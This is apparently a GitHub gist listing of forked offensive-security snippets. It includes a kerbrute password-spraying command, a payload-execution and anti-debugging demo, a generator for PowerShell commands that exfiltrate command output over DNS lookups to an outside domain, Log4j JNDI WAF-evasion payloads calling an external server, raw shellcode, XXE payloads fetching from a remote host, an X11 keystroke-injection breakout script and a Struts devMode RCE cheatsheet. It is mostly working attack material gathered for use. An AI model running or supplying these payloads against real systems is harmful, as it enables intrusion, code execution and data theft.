With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
rwincey
rwincey
/ AccessViolationHandlerPayloadExecution.cpp
Created
February 16, 2024 16:03
— forked from WKL-Sec/AccessViolationHandlerPayloadExecution.cpp
White Knight Labs - Offensive Development Course - Demo of using Exception Filter Function in C++ to catch Access Violations for payload execution and anti-debugging.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // White Knight Labs - Offensive Development Course | |
| // Guardrails - Control Flow & Anti-Debugging | |
| #include <windows.h> | |
| #include <iostream> | |
| // Test function to be called when an access violation occurs | |
| void TestFunction() { | |
| std::cout << "Test function executed after catching access violation." << std::endl; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import subprocess | |
| import base64 | |
| import gzip | |
| import urllib.parse | |
| import argparse | |
| def gen_cmd(cmd_str): | |
| inner_powershell_cmd = '''$i="";$n=((1..2 |%%{'{0:X}' -f (Get-Random -Max 16)}) -join '');((iex "cmd /c %s") -join "`r`n").ToCharArray()|%%{$i+=[String]::Format("{0:X2}",[Convert]::ToUInt32($_[0]))};$m=0;for($j=0;$j -lt $i.Length; $j+=60){$l='';if($j+60 -lt $i.Length){$l=($i.substring($j, 60))}else{$l=($i.substring($j))}$l+="."+$m+"."+$n+".m.1m.ms"; nslookup "$l";$m+=1};$g="_._."+$n+".m.1m.ms"; nslookup "$g"''' % cmd_str | |
| #print(inner_powershell_cmd) |
rwincey
/ ExploitDB.txt
Created
July 12, 2022 03:35
— forked from vijay922/ExploitDB.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| frs/admin/qrs.php | |
| __admin | |
| __cache/ | |
| __index.php | |
| __MACOSX | |
| __pma___ | |
| __SQL | |
| __test.php | |
| _.htpasswd | |
| _adm |
rwincey
/ Log4j Payloads
Created
December 12, 2021 22:58
— forked from ZephrFish/Log4j Payloads
Collection of WAF evasion payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ${jndi:ldap://127.0.0.1:1389/ badClassName} | |
| ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://l4j.zsec.uk/sploit} | |
| ${${::-j}ndi:rmi://l4j.zsec.uk/sploit} | |
| ${jndi:rmi://l4j.zsec.uk} | |
| ${${lower:jndi}:${lower:rmi}://l4j.zsec.uk/sploit} | |
| ${${lower:${lower:jndi}}:${lower:rmi}://l4j.zsec.uk/sploit} | |
| ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://l4j.zsec.uk/sploit} | |
| ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://l4j.zsec.uk/sploit} | |
| ${${upper:jndi}:${upper:rmi}://l4j.zsec.uk/sploit} | |
| ${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://l4j.zsec.uk/sploit} |
rwincey
/ shellcode.py
Created
September 26, 2021 15:11
— forked from YiChenChai/shellcode.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| egghunter = "I\xbe\x08\x94\x1c\x80\x01\x00\x00\x00H\xc7\xc1\x00\x11\x00\x00A\xff\x96\xd8\x0c\x00\x00H\x05\x00\x0f\x00\x00H\x8d\xa8\x00\x01\x00\x00H\x89\xc4H\x83\xecPH\xb92\xbb=\x80\x01\x00\x00\x00A\xff\x16I\x89\xc5H\x89\xc1A\xffV0H\x89\xc6H1\xdbH\x01\xdeL\x89\xe9H\x8d\x15\x02\x00\x00\x00\xeb\rVirtualQuery\x00A\xff\x96\x88\x01\x00\x00H\x89\xf1H\x89\xeaI\xc7\xc0\x00\x01\x00\x00\xff\xd0\x8b]\x18H\x8bu\x00\x8bE \xa9\x00 \x01\x00u\xbd\x8bE(\xa9\x00\x00\x02\x00t\xb3\x8bE$\xa9\x01\x00\x00\x00u\xa9L\x8d\x0c\x1eH\x8b\x06H=\xef\xbe7\x13t\x0bH\x83\xc6\x08L9\xceu\xec\xeb\x8fI\x89\xf1H\x83\xc6\x08H\x89\xf1H\xc7\xc2\x00P\x00\x00I\xc7\xc0@\x00\x00\x00H\x8d\x1d'\xff\xff\xff\xffS\xf8\xff\xe6" | |
| buf = "" | |
| buf += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41" | |
| buf += "\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" | |
| buf += "\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f" | |
| buf += "\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c" | |
| buf += "\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52" | |
| buf += "\x41\x51\x |
rwincey
/ kerberos_attacks_cheatsheet.md
Created
September 17, 2021 15:26
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
rwincey
/ XXE_payloads
Created
January 21, 2021 21:33
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
rwincey
/ x11.py
Created
January 21, 2021 14:59
— forked from staaldraad/x11.py
Python script to do keystrokes via X11 abstract socket. Useful for silly docker breakout.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Python script to connect to an abstract unix socket created by X11 and send arbitrary key-strokes. | |
| Created by: etienne@sensepost.com | |
| Credits to: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/x11/x11_keyboard_exec.rb | |
| Borrowed heavily from the original metasploit module. Thanks! | |
| """ | |
| from socket import * | |
| import subprocess |
rwincey
/ awk_netstat.sh
Created
January 21, 2021 14:58
— forked from staaldraad/awk_netstat.sh
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Gawk version | |
| # Remote | |
| grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}' | |
| # Local | |
| grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}' | |
| # No Gawk | |
| # Local | |
| grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){ |
rwincey
/ struts-cheatsheet.md
Created
October 15, 2020 12:21
— forked from mgeeky/struts-cheatsheet.md
Apache Struts devMode Remote Code Execution cheatsheet
Apacje Struts is a open source framework utilizing JavaEE web applications and encouraging to employ MVC (Model View Controller) architecture. When having the application developed in so-called devMode as set in the struts.xml file:
<constant name="struts.devMode" value="true" />
Then the middleware will be handling additional parameters passed to every function invocation.
NewerOlder